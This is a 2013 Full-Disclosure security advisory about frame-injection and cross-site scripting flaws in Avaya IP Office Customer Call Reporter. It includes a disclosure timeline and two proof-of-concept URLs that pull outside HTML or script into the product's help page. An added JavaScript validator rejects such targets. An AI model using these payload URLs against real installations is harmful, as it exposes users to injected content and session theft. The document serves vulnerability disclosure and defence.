Message-ID: <010101ce9eb0$52c3a7f0$9b7a6fd5@pc>
Date: Wed, 21 Aug 2013 23:51:37 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>,
"1337 Exploit DataBase" <mr.inj3ct0r@...il.com>
Subject: Vulnerabilities in Avaya IP Office Customer Call Reporter
Hello list!
I want to warn you about vulnerabilities in Avaya IP Office Customer Call
Reporter. These are Remote HTML Include and Remote XSS Include (Cross-Site
Scripting) vulnerabilities.
After I found multiple vulnerabilities in Avaya IP Office Customer Call
Reporter in December, I informed ZDI about them (the critical ones). ZDI was
very slow in processing these holes (despite my reminders) and only
on the 30th of July did they begin actively working on them. I wrote about this
case with ZDI in the WASC Mailing List
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-July/008883.html).
When Avaya ignored my notification in July and ZDI stopped working on this case
in August (since Avaya was not responding to them either), I published these
two vulnerabilities (the least critical). There are many other
vulnerabilities, including critical holes which allow taking control of the
admin panel, so Avaya still has a chance to get details of the vulnerabilities
in their product before public disclosure.
-------------------------
Affected products:
-------------------------
Avaya IP Office Customer Call Reporter 8.0.9.13 (tested in December 2012),
9.0.0.0 (tested recently) and previous versions are vulnerable.
-------------------------
Affected vendors:
-------------------------
Avaya Inc.
http://www.avaya.com
----------
Details:
----------
Remote HTML Include (Frame Injection) (WASC-12):
http://site/CCRWebClient/Help/en-US/index.htm?//websecurity.com.ua
Remote XSS Include (Cross-Site Scripting) (WASC-08):
http://site/CCRWebClient/Help/en-US/index.htm?//websecurity.com.ua/webtools/xss_r2.html
------------
Timeline:
------------
2012.12.06 - found multiple vulnerabilities (these ones and other critical
holes).
2012.12.13 - informed ZDI about other critical vulnerabilities.
2012.12.18 - again informed ZDI about other critical vulnerabilities.
2013.01.27 - registered at zerodayinitiative.com and informed them through
the site. ZDI started working on the case.
2013.07.28 - informed Avaya (via two contact forms) about these holes and
other critical vulnerabilities, due to slowness of ZDI.
2013.07.29 - wrote about ZDI in WASC Mailing List.
2013.07.30 - if earlier ZDI only pretended they were working on the case, this
time they started working actively on it (and tried to contact Avaya).
2013.08.07 - ZDI stopped working on the case and closed it, since Avaya was
not responding.
2013.08.20 - disclosed at my site (http://websecurity.com.ua/6717/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
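Added example, not Avaya's code and not part of the original post: a check a help page could apply before loading a query-string value into a frame, rejecting protocol-relative and absolute URLs like the two in the advisory and allowing only same-origin paths under the help directory. The base path, the `isSafeHelpTarget`/`resolveHelpTarget` names and the assumption that the query string is used as a frame source are all hypothetical.

```javascript
// Hypothetical hardening for a help index page that loads the query string
// into a frame. Uses only the WHATWG URL API (available in Node and browsers).
const HELP_BASE = "https://site/CCRWebClient/Help/en-US/"; // assumed base path

// Returns true only if rawQuery resolves to a same-origin page that sits
// under the help directory; protocol-relative ("//host"), absolute and
// scheme-prefixed values are rejected before and after resolution.
function isSafeHelpTarget(rawQuery, base = HELP_BASE) {
  // Accept location.search verbatim by dropping a leading "?".
  const q = rawQuery.startsWith("?") ? rawQuery.slice(1) : rawQuery;
  if (q === "") return false;
  // Cheap pre-checks: any scheme ("http:", "javascript:") or a leading
  // "//" or "\\" (protocol-relative, as in the advisory URLs) is rejected.
  if (/^[a-z][a-z0-9+.-]*:/i.test(q) || /^[\\/]{2}/.test(q)) return false;
  let resolved;
  try {
    resolved = new URL(q, base);
  } catch {
    return false;
  }
  const baseUrl = new URL(base);
  // The authoritative check: same origin and path still under the help
  // directory (the URL parser has already normalised any "../" segments).
  return (
    resolved.origin === baseUrl.origin &&
    resolved.pathname.startsWith(baseUrl.pathname)
  );
}

// Returns the URL to load: the validated target, or the local fallback page
// when the query string points anywhere off-site or outside the help tree.
function resolveHelpTarget(rawQuery, base = HELP_BASE, fallback = "index.htm") {
  const q = rawQuery.startsWith("?") ? rawQuery.slice(1) : rawQuery;
  return isSafeHelpTarget(q, base)
    ? new URL(q, base).href
    : new URL(fallback, base).href;
}
```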
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/